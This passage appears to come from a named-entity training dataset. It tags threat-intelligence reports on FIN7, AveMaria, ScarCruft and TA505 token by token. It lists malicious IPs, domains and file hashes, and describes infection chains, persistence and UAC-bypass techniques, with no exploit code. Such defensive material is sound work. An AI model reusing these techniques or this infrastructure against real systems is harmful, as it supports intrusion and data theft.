+where O
+it O
+can O
+monetize O
+its O
+access O
+. O
+
+FIN7 S-APT
+’s O
+last O
+campaigns O
+were O
+targeting O
+banks O
+in O
+Europe S-LOC
+and O
+Central B-LOC
+America E-LOC
+. O
+
+This O
+threat O
+actor O
+stole O
+suspected O
+of O
+stealing O
+€13 O
+million O
+from O
+Bank O
+of O
+Valetta S-LOC
+, O
+Malta S-LOC
+earlier B-TIME
+this I-TIME
+year E-TIME
+. O
+
+A O
+few O
+interesting O
+overlaps O
+in O
+recent O
+FIN7 S-APT
+campaigns O
+: O
+Both O
+used O
+macros S-TOOL
+to O
+copy O
+wscript.exe S-FILE
+to O
+another O
+file O
+, O
+which O
+began O
+with O
+“ O
+ms O
+” O
+( O
+mses.exe S-FILE
+– O
+FIN7 S-APT
+, O
+msutil.exe S-FILE
+– O
+EmpireMonkey S-MAL
+) O
+. O
+
+Both O
+executed O
+a O
+JScript S-TOOL
+file O
+named O
+“ O
+error O
+” O
+in O
+%TEMP% O
+( O
+Errors.txt S-FILE
+in O
+the O
+case O
+of O
+FIN7 S-APT
+, O
+Errors.bat S-FILE
+for O
+EmpireMonkey S-MAL
+) O
+. O
+
+Both O
+used O
+DocuSign S-TOOL
+decoy O
+documents O
+with O
+different O
+macros S-TOOL
+. O
+
+The O
+macros S-TOOL
+popped O
+the O
+same O
+“ O
+Document O
+decryption O
+error O
+” O
+error O
+message—even O
+if O
+macro S-TOOL
+code O
+remain O
+totally O
+different O
+. O
+
+We O
+have O
+a O
+high O
+level O
+of O
+confidence O
+in O
+a O
+historic O
+association O
+between O
+FIN7 S-APT
+and O
+Cobalt S-MAL
+, O
+even O
+though O
+we O
+believe O
+that O
+these O
+two O
+clusters O
+of O
+activity O
+are O
+operated O
+by O
+different O
+teams O
+. O
+
+AveMaria S-MAL
+is O
+a O
+new O
+botnet O
+, O
+whose O
+first O
+version O
+we O
+found O
+in O
+September B-TIME
+2018 E-TIME
+, O
+right O
+after O
+the O
+arrests O
+of O
+the O
+FIN7 S-APT
+members O
+. O
+
+We O
+have O
+medium O
+confidence O
+that O
+this O
+botnet O
+falls O
+under O
+the O
+FIN7 S-APT
+umbrella O
+. O
+
+In O
+fact O
+, O
+AveMaria S-MAL
+is O
+a O
+classic O
+infostealer O
+bot O
+that O
+collects O
+all O
+possible O
+credentials O
+from O
+various O
+types O
+of O
+software O
+: O
+browsers O
+, O
+email S-TOOL
+clients O
+, O
+messengers O
+, O
+etc. O
+, O
+and O
+can O
+act O
+as O
+a O
+keylogger O
+. O
+
+Since O
+the B-TIME
+beginning I-TIME
+of I-TIME
+2019 E-TIME
+, O
+we O
+have O
+collected O
+more O
+than O
+1300 O
+samples O
+and O
+extracted O
+more O
+than O
+130 O
+C2s O
+. O
+
+To O
+deliver O
+their O
+malware O
+, O
+the O
+cyber O
+criminals O
+use O
+spearphishing S-ACT
+emails S-TOOL
+with O
+various O
+types O
+of O
+attachments O
+: O
+MS S-IDTY
+Office S-TOOL
+documents O
+or O
+spreadsheet O
+files O
+exploiting O
+some O
+known O
+vulnerability O
+like O
+CVE-2017-11882 S-VULID
+, O
+or O
+documents O
+with O
+Ole2Link S-VULNAME
+and O
+SCT S-VULNAME
+. O
+
+They O
+also O
+use O
+AutoIT S-TOOL
+droppers O
+, O
+password-protected O
+EXE S-TOOL
+files O
+and O
+even O
+ISO S-TOOL
+images O
+. O
+
+What O
+is O
+interesting O
+, O
+in O
+some O
+emails S-TOOL
+, O
+they O
+ask O
+targets O
+to O
+phone O
+them O
+if O
+they O
+have O
+any O
+questions O
+, O
+like O
+the O
+FIN7 S-APT
+guys O
+do O
+. O
+
+During O
+the O
+investigation O
+into O
+FIN7 S-APT
+, O
+our O
+threat-hunting O
+systems O
+found O
+an O
+interesting O
+overlap O
+in O
+between O
+the O
+infrastructure O
+of O
+FIN7 S-APT
+and O
+AveMaria S-MAL
+. O
+
+Basically O
+, O
+two O
+servers O
+in O
+the O
+same O
+IP O
+range O
+and O
+AS14576 O
+( O
+autonomous O
+system O
+) O
+share O
+a O
+non-standard O
+SSH S-PROT
+port O
+, O
+which O
+is O
+222 O
+. O
+
+One O
+of O
+the O
+servers O
+is O
+a O
+Griffon S-MAL
+C2, O
+and O
+the O
+other O
+one O
+, O
+an O
+AveMaria S-MAL
+C2 S-TOOL
+. O
+
+Distribution O
+of O
+targets O
+is O
+another O
+factor O
+suggesting O
+that O
+these O
+two O
+malware O
+families O
+may O
+be O
+connected O
+. O
+
+We O
+analyzed O
+AveMaria S-MAL
+targets O
+during O
+February B-TIME
+and I-TIME
+March I-TIME
+of I-TIME
+2019 E-TIME
+. O
+
+The O
+spearphishing S-ACT
+emails S-TOOL
+were O
+sent O
+to O
+various O
+kinds O
+of O
+businesses O
+only O
+and O
+did O
+not O
+target O
+individuals O
+. O
+
+Thirty O
+percent O
+of O
+the O
+targets O
+were O
+small O
+and O
+medium-sized O
+companies O
+that O
+were O
+suppliers O
+or O
+service O
+providers O
+for O
+bigger O
+players O
+and O
+21% O
+were O
+various O
+types O
+of O
+manufacturing O
+companies O
+. O
+
+We O
+also O
+spotted O
+several O
+typical O
+FIN7 S-APT
+targets O
+, O
+such O
+as O
+retailers O
+and O
+hotels O
+. O
+
+Most O
+AveMaria S-MAL
+targets O
+( O
+72% O
+) O
+were O
+in O
+the O
+EU S-IDTY
+. O
+
+At O
+the B-TIME
+end I-TIME
+of I-TIME
+2018 E-TIME
+, O
+while O
+searching O
+for O
+new O
+FIN7 S-APT
+campaigns O
+via O
+telemetry O
+, O
+we O
+discovered O
+a O
+set O
+of O
+activity O
+that O
+we O
+temporarily O
+called O
+“ O
+CopyPaste S-APT
+” O
+from O
+a O
+previously O
+unknown O
+APT O
+. O
+
+Interestingly O
+, O
+this O
+actor O
+targeted O
+financial O
+entities O
+and O
+companies O
+in O
+one O
+African O
+country O
+, O
+which O
+lead O
+us O
+to O
+think O
+that O
+CopyPaste S-APT
+was O
+associated O
+with O
+cybermercenaries O
+or O
+a O
+training O
+center O
+. O
+
+This O
+set O
+of O
+activity O
+relied O
+on O
+open-source O
+tools O
+, O
+such O
+as O
+Powershell S-TOOL
+Empire S-TOOL
+, O
+and O
+well-documented O
+red O
+teaming O
+techniques O
+, O
+in O
+order O
+to O
+get O
+a O
+foothold O
+within O
+the O
+victim’s O
+networks O
+and O
+avoid O
+detection O
+. O
+
+The O
+links O
+between O
+CopyPaste S-APT
+and O
+FIN7 S-APT
+are O
+still O
+very O
+weak O
+. O
+
+It O
+is O
+possible O
+that O
+the O
+CopyPaste S-APT
+operators O
+were O
+influenced O
+by O
+open-source O
+publications O
+and O
+do O
+not O
+have O
+any O
+ties O
+with O
+FIN7 S-APT
+. O
+
+During O
+2018 S-TIME
+, O
+Europol S-IDTY
+and O
+DoJ S-IDTY
+announced O
+the O
+arrest O
+of O
+the O
+leader O
+of O
+the O
+FIN7 S-APT
+and O
+Carbanak S-APT/CobaltGoblin S-APT
+cybercrime O
+groups O
+. O
+
+It O
+was O
+believed O
+that O
+the O
+arrest O
+of O
+the O
+group O
+leader O
+will O
+have O
+an O
+impact O
+on O
+the O
+group’s O
+operations O
+. O
+
+However O
+, O
+recent O
+data O
+seems O
+to O
+indicate O
+that O
+the O
+attacks O
+have O
+continued O
+without O
+significant O
+drawbacks O
+. O
+
+One O
+may O
+say O
+CobaltGoblin S-APT
+and O
+FIN7 S-APT
+have O
+even O
+extended O
+the O
+number O
+of O
+groups O
+operating O
+under O
+their O
+umbrella O
+. O
+
+We O
+observe O
+, O
+with O
+various O
+level O
+of O
+confidence O
+, O
+that O
+there O
+are O
+several O
+interconnected O
+groups O
+using O
+very O
+similar O
+toolkits O
+and O
+the O
+same O
+infrastructure O
+to O
+conduct O
+their O
+cyberattacks O
+. O
+
+The O
+first O
+of O
+them O
+is O
+the O
+well-known O
+FIN7 S-APT
+, O
+which O
+specializes O
+in O
+attacking O
+various O
+companies O
+to O
+get O
+access O
+to O
+financial O
+data O
+or O
+PoS S-TOOL
+infrastructure O
+. O
+
+They O
+rely O
+on O
+a O
+Griffon S-MAL
+JS S-TOOL
+backdoor O
+and O
+Cobalt S-MAL/Meterpreter S-TOOL
+, O
+and O
+in O
+recent O
+attacks O
+, O
+Powershell S-TOOL
+Empire S-TOOL
+. O
+
+The O
+second O
+one O
+is O
+CobaltGoblin S-APT/Carbanak S-APT/EmpireMonkey S-APT
+, O
+which O
+uses O
+the O
+same O
+toolkit O
+, O
+techniques O
+and O
+similar O
+infrastructure O
+but O
+targets O
+only O
+financial O
+institutions O
+and O
+associated O
+software/services O
+providers O
+. O
+
+We O
+link O
+the O
+AveMaria S-MAL
+botnet O
+to O
+these O
+two O
+groups O
+with O
+medium O
+confidence O
+: O
+AveMaria S-MAL
+’s O
+targets O
+are O
+mostly O
+suppliers O
+for O
+big O
+companies O
+, O
+and O
+the O
+way O
+AveMaria S-MAL
+manages O
+its O
+infrastructure O
+is O
+very O
+similar O
+to O
+FIN7 S-APT
+. O
+
+The O
+last O
+piece O
+is O
+the O
+newly O
+discovered O
+CopyPaste S-APT
+group O
+, O
+who O
+targeted O
+financial O
+entities O
+and O
+companies O
+in O
+one O
+African O
+country O
+, O
+which O
+lead O
+us O
+to O
+think O
+that O
+CopyPaste S-APT
+was O
+associated O
+with O
+cybermercenaries O
+or O
+a O
+training O
+center O
+. O
+
+The O
+links O
+between O
+CopyPaste S-APT
+and O
+FIN7 S-APT
+are O
+still O
+very O
+weak O
+. O
+
+It O
+is O
+possible O
+that O
+the O
+operators O
+of O
+this O
+cluster O
+of O
+activity O
+were O
+influenced O
+by O
+open-source O
+publications O
+and O
+do O
+not O
+have O
+any O
+ties O
+with O
+FIN7 S-APT
+. O
+
+All O
+of O
+the O
+aforementioned O
+groups O
+greatly O
+benefit O
+from O
+unpatched O
+systems O
+in O
+corporate O
+environments O
+. O
+
+They O
+thus O
+continue O
+to O
+use O
+effective O
+spearphishing S-ACT
+campaigns O
+in O
+conjunction O
+with O
+well-known O
+MS S-IDTY
+Office S-TOOL
+exploits O
+generated O
+by O
+the O
+framework O
+. O
+
+So O
+far O
+, O
+the O
+groups O
+have O
+not O
+used O
+any O
+zero-days S-VULNAME
+. O
+
+FIN7 S-APT/Cobalt S-MAL
+phishing E-ACT
+documents O
+may O
+seem O
+basic O
+, O
+but O
+when O
+combined O
+with O
+their O
+extensive O
+social O
+engineering O
+and O
+focused O
+targeting O
+, O
+they O
+are O
+quite O
+successful O
+. O
+
+As O
+with O
+their O
+previous O
+fake O
+company O
+“ O
+Combi B-IDTY
+Security E-IDTY
+” O
+, O
+we O
+are O
+confident O
+that O
+they O
+continue O
+to O
+create O
+new O
+personas O
+for O
+use O
+in O
+either O
+targeting O
+or O
+recruiting O
+under O
+a O
+“ O
+new O
+” O
+brand O
+, O
+“ O
+IPC S-IDTY
+” O
+. O
+
+AveMaria S-MAL
+: O
+185.61.138.249 S-IP
+tain.warzonedns.com S-DOM
+noreply377.ddns.net S-DOM
+185.162.131.97 S-IP
+91.192.100.62 S-IP
+server.mtcc.me S-DOM
+doddyfire.dyndns.org S-DOM
+212.8.240.116 S-IP
+168.167.45.162 S-IP
+toekie.ddns.net S-DOM
+warmaha.warzonedns.com S-DOM
+. O
+
+CopyPaste S-APT
+: O
+digi-cert.org S-DOM
+somtelnetworks.com S-DOM
+geotrusts.com S-DOM
+secureclientupdate.com S-DOM
+digicertweb.com S-DOM
+sport-pesa.org S-DOM
+itaxkenya.com S-DOM
+businessdailyafrica.net S-DOM
+infotrak-research.com S-DOM
+nairobiwired.com S-DOM
+k-24tv.com S-DOM
+. O
+
+FIN7 S-APT/GRIFFON S-MAL
+: O
+hpservice-cdn.com S-DOM
+realtek-cdn.com S-DOM
+logitech-cdn.com S-DOM
+pci-cdn.com S-DOM
+appleservice-cdn.com S-DOM
+servicebing-cdn.com S-DOM
+. O
+
+
+ScarCruft S-APT
+continues O
+to O
+evolve, O
+introduces O
+Bluetooth S-TOOL
+harvester O
+. O
+
+After O
+publishing O
+our O
+initial O
+series O
+of O
+blogposts O
+back O
+in O
+2016 S-TIME
+, O
+we O
+have O
+continued O
+to O
+track O
+the O
+ScarCruft S-APT
+threat O
+actor O
+. O
+
+ScarCruft S-APT
+is O
+a O
+Korean-speaking O
+and O
+allegedly O
+state-sponsored O
+threat O
+actor O
+that O
+usually O
+targets O
+organizations O
+and O
+companies O
+with O
+links O
+to O
+the O
+Korean O
+peninsula O
+. O
+
+We O
+recently O
+discovered O
+some O
+interesting O
+telemetry O
+on O
+this O
+actor O
+, O
+and O
+decided O
+to O
+dig O
+deeper O
+into O
+ScarCruft S-APT
+’s O
+recent O
+activity O
+. O
+
+This O
+shows O
+that O
+the O
+actor O
+is O
+still O
+very O
+active O
+and O
+constantly O
+trying O
+to O
+elaborate O
+its O
+attack O
+tools O
+. O
+
+Based O
+on O
+our O
+telemetry O
+, O
+we O
+can O
+reassemble O
+ScarCruft S-APT
+’s O
+binary O
+infection O
+procedure O
+. O
+
+It O
+used O
+a O
+multi-stage O
+binary O
+infection O
+to O
+update O
+each O
+module O
+effectively O
+and O
+evade O
+detection O
+. O
+
+In O
+addition O
+, O
+we O
+analyzed O
+the O
+victims O
+of O
+this O
+campaign O
+and O
+spotted O
+an O
+interesting O
+overlap O
+of O
+this O
+campaign O
+with O
+another O
+APT O
+actor O
+known O
+as O
+DarkHotel S-APT
+. O
+
+The O
+ScarCruft S-APT
+group O
+uses O
+common O
+malware O
+delivery O
+techniques O
+such O
+as O
+spear B-ACT
+phishing E-ACT
+and O
+Strategic B-ACT
+Web I-ACT
+Compromises E-ACT
+( O
+SWC S-ACT
+) O
+. O
+
+As O
+in O
+Operation B-ACT
+Daybreak E-ACT
+, O
+this O
+actor O
+performs O
+sophisticated O
+attacks O
+using O
+a O
+zero-day S-MAL
+exploit O
+. O
+
+However O
+, O
+sometimes O
+using O
+public O
+exploit O
+code O
+is O
+quicker O
+and O
+more O
+effective O
+for O
+malware O
+authors O
+. O
+
+We O
+witnessed O
+this O
+actor O
+extensively O
+testing O
+a O
+known O
+public O
+exploit O
+during O
+its O
+preparation O
+for O
+the O
+next O
+campaign O
+. O
+
+In O
+order O
+to O
+deploy O
+an O
+implant O
+for O
+the O
+final O
+payload O
+, O
+ScarCruft S-APT
+uses O
+a O
+multi-stage O
+binary O
+infection O
+scheme O
+. O
+
+As O
+a O
+rule O
+, O
+the O
+initial O
+dropper O
+is O
+created O
+by O
+the O
+infection O
+procedure O
+. O
+
+One O
+of O
+the O
+most O
+notable O
+functions O
+of O
+the O
+initial O
+dropper O
+is O
+to O
+bypass O
+Windows S-OS
+UAC S-TOOL
+( O
+User B-TOOL
+Account I-TOOL
+Control E-TOOL
+) O
+in O
+order O
+to O
+execute O
+the O
+next O
+payload O
+with O
+higher O
+privileges O
+. O
+
+This O
+malware O
+uses O
+the O
+public O
+privilege O
+escalation O
+exploit O
+code O
+CVE-2018-8120 S-VULID
+or O
+UACME S-VULNAME
+which O
+is O
+normally O
+used O
+by O
+legitimate O
+red O
+teams O
+. O
+
+Afterwards O
+, O
+the O
+installer S-TOOL
+malware O
+creates O
+a O
+downloader O
+and O
+a O
+configuration O
+file O
+from O
+its O
+resource O
+and O
+executes O
+it O
+. O
+
+The O
+downloader S-TOOL
+malware O
+uses O
+the O
+configuration O
+file O
+and O
+connects O
+to O
+the O
+C2 S-TOOL
+server O
+to O
+fetch O
+the O
+next O
+payload O
+. O
+
+In O
+order O
+to O
+evade O
+network O
+level O
+detection O
+, O
+the O
+downloader S-TOOL
+uses O
+steganography O
+. O
+
+The O
+downloaded O
+payload O
+is O
+an O
+image O
+file O
+, O
+but O
+it O
+contains O
+an O
+appended O
+malicious O
+payload O
+to O
+be O
+decrypted O
+. O
+
+The O
+final O
+payload O
+created O
+by O
+the O
+aforementioned O
+process O
+is O
+a O
+well O
+known O
+backdoor O
+, O
+also O
+known O
+as O
+ROKRAT S-MAL
+by O
+Cisco B-SECTEAM
+Talos E-SECTEAM
+. O
+
+This O
+cloud O
+service-based O
+backdoor O
+contains O
+many O
+features O
+. O
+
+One O
+of O
+its O
+main O
+functions O
+is O
+to O
+steal O
+information O
+. O
+
+Upon O
+execution O
+, O
+this O
+malware O
+creates O
+10 O
+random O
+directory O
+paths O
+and O
+uses O
+them O
+for O
+a O
+specially O
+designated O
+purpose O
+. O
+
+The O
+malware O
+creates O
+11 O
+threads O
+simultaneously O
+: O
+six O
+threads O
+are O
+responsible O
+for O
+stealing O
+information O
+from O
+the O
+infected O
+host O
+, O
+and O
+five O
+threads O
+are O
+for O
+forwarding O
+collected O
+data O
+to O
+four O
+cloud O
+services O
+( O
+Box S-TOOL
+, O
+Dropbox S-TOOL
+, O
+Pcloud S-TOOL
+and O
+Yandex S-TOOL
+) O
+. O
+
+When O
+uploading O
+stolen O
+data O
+to O
+a O
+cloud O
+service O
+, O
+it O
+uses O
+predefined O
+directory O
+path O
+such O
+as O
+/english O
+, O
+/video O
+or O
+/scriptout O
+. O
+
+The O
+ScarCruft S-APT
+group O
+keeps O
+expanding O
+its O
+Exfiltration S-ACT
+targets O
+to O
+steal O
+further O
+information O
+from O
+infected O
+hosts O
+and O
+continues O
+to O
+create O
+tools O
+for O
+additional O
+data O
+Exfiltration S-ACT
+. O
+
+We O
+also O
+discovered O
+an O
+interesting O
+piece O
+of O
+rare O
+malware O
+created O
+by O
+this O
+threat O
+actor O
+– O
+a O
+Bluetooth S-TOOL
+device O
+harvester O
+. O
+
+This O
+malware O
+is O
+responsible O
+for O
+stealing O
+Bluetooth S-TOOL
+device O
+information O
+. O
+
+It O
+is O
+fetched O
+by O
+a O
+downloader O
+, O
+and O
+collects O
+information O
+directly O
+from O
+the O
+infected O
+host O
+. O
+
+This O
+malware O
+uses O
+Windows S-OS
+Bluetooth S-TOOL
+APIs O
+to O
+find O
+information O
+on O
+connected O
+Bluetooth S-TOOL
+devices O
+and O
+saves O
+the O
+following O
+information O
+. O
+
+We O
+have O
+found O
+several O
+victims O
+of O
+this O
+campaign O
+, O
+based O
+on O
+our O
+telemetry O
+– O
+investment O
+and O
+trading O
+companies O
+in O
+Vietnam S-LOC
+and O
+Russia S-LOC
+. O
+
+We O
+believe O
+they O
+may O
+have O
+some O
+links O
+to O
+North B-LOC
+Korea E-LOC
+, O
+which O
+may O
+explain O
+why O
+ScarCruft S-APT
+decided O
+to O
+closely O
+monitor O
+them O
+. O
+
+ScarCruft S-APT
+also O
+attacked O
+a O
+diplomatic O
+agency O
+in O
+Hong B-LOC
+Kong E-LOC
+, O
+and O
+another O
+diplomatic O
+agency O
+in O
+North B-LOC
+Korea E-LOC
+. O
+
+It O
+appears O
+ScarCruft S-APT
+is O
+primarily O
+targeting O
+intelligence O
+for O
+political O
+and O
+diplomatic O
+purposes O
+. O
+
+We O
+discovered O
+one O
+victim O
+from O
+Russia S-LOC
+that O
+also O
+triggered O
+a O
+malware O
+detection O
+while O
+staying O
+in O
+North B-LOC
+Korea E-LOC
+in O
+the O
+past O
+. O
+
+The O
+fact O
+that O
+this O
+victim O
+visits O
+North B-LOC
+Korea E-LOC
+makes O
+its O
+special O
+and O
+suggests O
+that O
+it O
+may O
+have O
+valuable O
+information O
+about O
+North O
+Korean O
+affairs O
+. O
+
+ScarCruft S-APT
+infected O
+this O
+victim O
+on O
+September B-TIME
+21, I-TIME
+2018 E-TIME
+. O
+
+But O
+before O
+the O
+ScarCruft S-APT
+infection O
+, O
+however O
+, O
+another O
+APT O
+group O
+also O
+targeted O
+this O
+victim O
+with O
+the O
+host O
+being O
+infected O
+with O
+GreezeBackdoor S-MAL
+on O
+March B-TIME
+26, I-TIME
+2018 E-TIME
+. O
+
+GreezeBackdoor S-MAL
+is O
+a O
+tool O
+of O
+the O
+DarkHotel S-APT
+APT O
+group O
+, O
+which O
+we O
+have O
+previously O
+written O
+about O
+. O
+
+In O
+addition O
+, O
+this O
+victim O
+was O
+also O
+attacked O
+by O
+the O
+Konni S-MAL
+malware O
+on O
+03 B-TIME
+April I-TIME
+2018 E-TIME
+. O
+
+The O
+Konni S-MAL
+malware O
+was O
+disguised O
+as O
+a O
+North O
+Korean O
+news O
+item O
+in O
+a O
+weaponized O
+documents O
+( O
+the O
+name O
+of O
+the O
+document O
+was O
+“ O
+Why O
+North B-LOC
+Korea E-LOC
+slams O
+South B-LOC
+Korea E-LOC
+’s O
+recent O
+defense O
+talks O
+with O
+U.S-Japan.zip S-FILE
+” O
+) O
+This O
+is O
+not O
+the O
+first O
+time O
+we O
+have O
+seen O
+an O
+overlap O
+of O
+ScarCruft S-APT
+and O
+DarkHotel S-APT
+actors O
+. O
+
+Members O
+from O
+our O
+team O
+have O
+already O
+presented O
+on O
+the O
+conflict O
+of O
+these O
+two O
+threat O
+actors O
+at O
+security O
+conferences O
+. O
+
+We O
+have O
+also O
+shared O
+more O
+details O
+with O
+our O
+threat O
+intelligence O
+customers O
+in O
+the O
+past O
+. O
+
+They O
+are O
+both O
+Korean-speaking O
+threat O
+actors O
+and O
+sometimes O
+their O
+victimology O
+overlaps O
+. O
+
+But O
+both O
+group O
+seem O
+to O
+have O
+different O
+TTPs O
+( O
+Tactics O
+, O
+Techniques O
+and O
+Procedures O
+) O
+and O
+it O
+leads O
+us O
+to O
+believe O
+that O
+one O
+group O
+regularly O
+lurks O
+in O
+the O
+other O
+’s O
+shadow O
+. O
+
+The O
+ScarCruft S-APT
+has O
+shown O
+itself O
+to O
+be O
+a O
+highly-skilled O
+and O
+active O
+group O
+. O
+
+It O
+has O
+a O
+keen O
+interest O
+in O
+North O
+Korean O
+affairs O
+, O
+attacking O
+those O
+in O
+the O
+business O
+sector O
+who O
+may O
+have O
+any O
+connection O
+to O
+North B-LOC
+Korea E-LOC
+, O
+as O
+well O
+as O
+diplomatic O
+agencies O
+around O
+the O
+globe O
+. O
+
+ScarCruft S-APT
+tools O
+: O
+02681a7fe708f39beb7b3cf1bd557ee9 S-MD5
+Bluetooth S-TOOL
+info O
+harvester O
+. O
+
+ScarCruft S-APT
+tools O
+: O
+C781f5fad9b47232b3606e4d374900cd S-MD5
+Installer S-TOOL
+. O
+
+ScarCruft S-APT
+tools O
+: O
+032ed0cd234f73865d55103bf4ceaa22 S-MD5
+Downloader S-TOOL
+. O
+
+ScarCruft S-APT
+tools O
+: O
+22aaf617a86e026424edb7c868742495 S-MD5
+AV B-TOOL
+Remover E-TOOL
+. O
+
+ScarCruft S-APT
+tools O
+: O
+07d2200f5c2d03845adb5b20841faa94 S-MD5
+AV B-TOOL
+Remover E-TOOL
+. O
+
+GreezaBackdoor S-MAL
+of O
+DarkHotel S-APT
+: O
+5e0e11bca0e94914e565c1dcc1ee6860 S-MD5
+. O
+
+
+TA505 S-APT
+is O
+Expanding O
+its O
+Operations O
+In O
+the O
+last O
+few O
+days O
+, O
+during O
+monitoring O
+activities O
+, O
+Yoroi B-SECTEAM
+CERT E-SECTEAM
+noticed O
+a O
+suspicious O
+attack O
+against O
+an O
+Italian O
+organization O
+. O
+
+The O
+malicious O
+email S-TOOL
+contains O
+a O
+highly O
+suspicious O
+sample O
+which O
+triggered O
+the O
+ZLAB S-SECTEAM
+team O
+to O
+investigate O
+its O
+capabilities O
+and O
+its O
+possible O
+attribution O
+, O
+discovering O
+a O
+potential O
+expansion O
+of O
+the O
+TA505 S-APT
+operation O
+. O
+
+The O
+threat O
+group O
+is O
+also O
+known O
+for O
+its O
+recent O
+attack O
+campaign O
+against O
+Bank O
+and O
+Retail O
+business O
+sectors O
+, O
+but O
+the O
+latest O
+evidence O
+indicates O
+a O
+potential O
+expansion O
+of O
+its O
+criminal O
+operation O
+to O
+other O
+industries O
+too O
+. O
+
+Dropper S-MAL
+: O
+0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc273 S-SHA2
+Excel S-TOOL
+file O
+with O
+malicious B-TOOL
+macro E-TOOL
+. O
+
+The O
+intercepted O
+attack O
+starts O
+with O
+a O
+spear B-ACT
+phishing I-ACT
+email E-ACT
+embedding O
+a O
+spreadsheet O
+. O
+
+The O
+document O
+is O
+weaponized O
+with O
+malicious B-TOOL
+macro E-TOOL
+code O
+triggered O
+when O
+the O
+user O
+opens O
+the O
+document O
+to O
+see O
+the O
+content O
+under O
+the O
+obfuscated O
+view O
+. O
+
+To O
+understand O
+its O
+capabilities O
+, O
+the O
+macro S-TOOL
+code O
+has O
+been O
+isolated O
+and O
+analyzed O
+in O
+detail O
+. O
+
+Surprisingly O
+, O
+the O
+source O
+code O
+is O
+composed O
+by O
+more O
+than O
+1600 O
+lines O
+of O
+code O
+and O
+it O
+is O
+highly O
+obfuscated O
+. O
+
+Paying O
+more O
+attention O
+during O
+the O
+code O
+analysis O
+, O
+we O
+discovered O
+that O
+it O
+is O
+full O
+of O
+junk O
+instructions O
+used O
+to O
+declare O
+and O
+initialize O
+variables O
+never O
+used O
+. O
+
+Only O
+a O
+small O
+portion O
+of O
+this O
+code O
+is O
+actually O
+used O
+to O
+start O
+the O
+infection O
+, O
+the O
+rest O
+is O
+just O
+junk O
+code O
+. O
+
+Once O
+the O
+macro S-TOOL
+is O
+executed O
+, O
+the O
+malware O
+downloads O
+two O
+files O
+from O
+“ O
+kentona[.su S-DOM
+” O
+, O
+using O
+an O
+SSL S-PROT
+encrypted O
+communication O
+, O
+and O
+stores O
+them O
+in O
+“ O
+C:\Users\Public O
+” O
+path O
+: O
+“ O
+rtegre.exe S-FILE
+” O
+and O
+“ O
+wprgxyeqd79.exe S-FILE
+” O
+. O
+
+Generic S-MAL
+: O
+aafa83d5e0619e69e64fcac4626cfb298baac54c7251f479721df1c2eb16bee7 S-SHA2
+Trojan S-MAL/Downloader S-TOOL
+( O
+Executable O
+file O
+) O
+. O
+
+Trojan S-MAL
+: O
+6f1a8ee627ec2ed7e1d818d32a34a163416938eb13a97783a71f9b79843a80a2 S-SHA2
+SFX S-TOOL
+( O
+self-extracting B-TOOL
+archive E-TOOL
+) O
+( O
+Executable O
+file O
+) O
+. O
+
+The O
+“ O
+wprgxyeqd79.exe S-FILE
+” O
+sample O
+actually O
+is O
+a O
+Self B-TOOL
+Extracting I-TOOL
+Archive E-TOOL
+( O
+SFX S-TOOL/SFA S-TOOL
+) O
+containing O
+four O
+files O
+designed O
+to O
+be O
+extracted O
+in O
+the O
+%TEMP% O
+folder O
+. O
+
+After O
+that O
+, O
+it O
+executes O
+“ O
+exit.exe S-FILE
+” O
+which O
+launches O
+the O
+“ O
+i.cmd S-FILE
+” O
+batch O
+script O
+. O
+
+This O
+new O
+script O
+performs O
+a O
+ping O
+to O
+“ O
+www[.cloudflare[.com S-DOM
+” O
+for O
+three O
+times O
+with O
+a O
+delay O
+of O
+3000ms O
+, O
+testing O
+the O
+connectivity O
+of O
+the O
+victim O
+machine O
+. O
+
+If O
+the O
+host O
+is O
+successfully O
+reached O
+, O
+the O
+script O
+renames O
+a O
+file O
+named O
+“ O
+kernel.dll S-FILE
+” O
+, O
+obviously O
+not O
+the O
+real O
+one O
+, O
+in O
+“ O
+uninstall.exe S-FILE
+” O
+, O
+another O
+misleading O
+name O
+. O
+
+Then O
+it O
+invokes O
+the O
+renamed O
+executable O
+and O
+runs O
+it O
+passing O
+a O
+series O
+of O
+parameter O
+: O
+“ O
+uninstall.exe S-FILE
+x O
+-pQELRatcwbU2EJ5 O
+-y O
+” O
+
+These O
+parameters O
+are O
+needed O
+to O
+self-decrypt O
+the O
+“ O
+uninstall.exe S-FILE
+” O
+file O
+which O
+is O
+again O
+another O
+SFX S-TOOL
+archive O
+. O
+
+The O
+“ O
+-p O
+” O
+parameter O
+, O
+indeed O
+, O
+specify O
+the O
+password O
+of O
+the O
+archive O
+to O
+be O
+extracted O
+. O
+
+The O
+crucial O
+file O
+, O
+at O
+this O
+point O
+of O
+the O
+infection O
+, O
+is O
+the O
+SFX S-TOOL
+executable O
+named O
+“ O
+uninstall.exe S-FILE
+” O
+. O
+
+It O
+has O
+a O
+structure O
+similar O
+to O
+previous O
+“ O
+wprgxyeqd79.exe S-FILE
+” O
+file O
+: O
+two O
+of O
+their O
+files O
+have O
+the O
+same O
+name O
+, O
+but O
+the O
+content O
+of O
+this O
+new O
+SFX S-TOOL
+is O
+extracted O
+in O
+the O
+“ O
+%ALLUSERSPROFILE%\Windows S-OS
+Anytime O
+Upgrade O
+” O
+directory O
+. O
+
+Another O
+time O
+, O
+the O
+execution O
+flow O
+moves O
+from O
+“ O
+exit.exe S-FILE
+to O
+“ O
+i.cmd S-FILE
+” O
+. O
+
+The O
+script O
+is O
+quite O
+different O
+from O
+the O
+previous O
+one O
+: O
+it O
+guarantees O
+its O
+persistence O
+on O
+the O
+victim O
+machine O
+through O
+the O
+setting O
+of O
+“ O
+HKCU\Software\Microsoft\Windows\CurrentVersion\Run O
+” O
+registry O
+key O
+, O
+creating O
+a O
+new O
+entry O
+named O
+“ O
+Windows S-OS
+Anytime O
+Upgrade O
+” O
+which O
+points O
+to O
+“ O
+winserv.exe S-FILE
+” O
+, O
+just O
+stored O
+into O
+the O
+same O
+folder O
+. O
+
+Thus O
+, O
+the O
+script O
+provides O
+to O
+run O
+“ O
+winserv.exe S-FILE
+” O
+. O
+
+An O
+interesting O
+part O
+of O
+the O
+script O
+is O
+the O
+continuous O
+killing O
+of O
+every O
+“ O
+rundll32.exe S-FILE
+” O
+process O
+running O
+into O
+the O
+victim O
+machine O
+, O
+generates O
+a O
+huge O
+amount O
+of O
+noise O
+, O
+as O
+visible O
+in O
+the O
+following O
+process O
+explorer O
+view O
+. O
+
+Anyway O
+, O
+just O
+before O
+the O
+kill O
+loop O
+, O
+the O
+real O
+malicious O
+payload O
+is O
+executed O
+: O
+the O
+
+“ O
+winserv.exe S-FILE
+” O
+file O
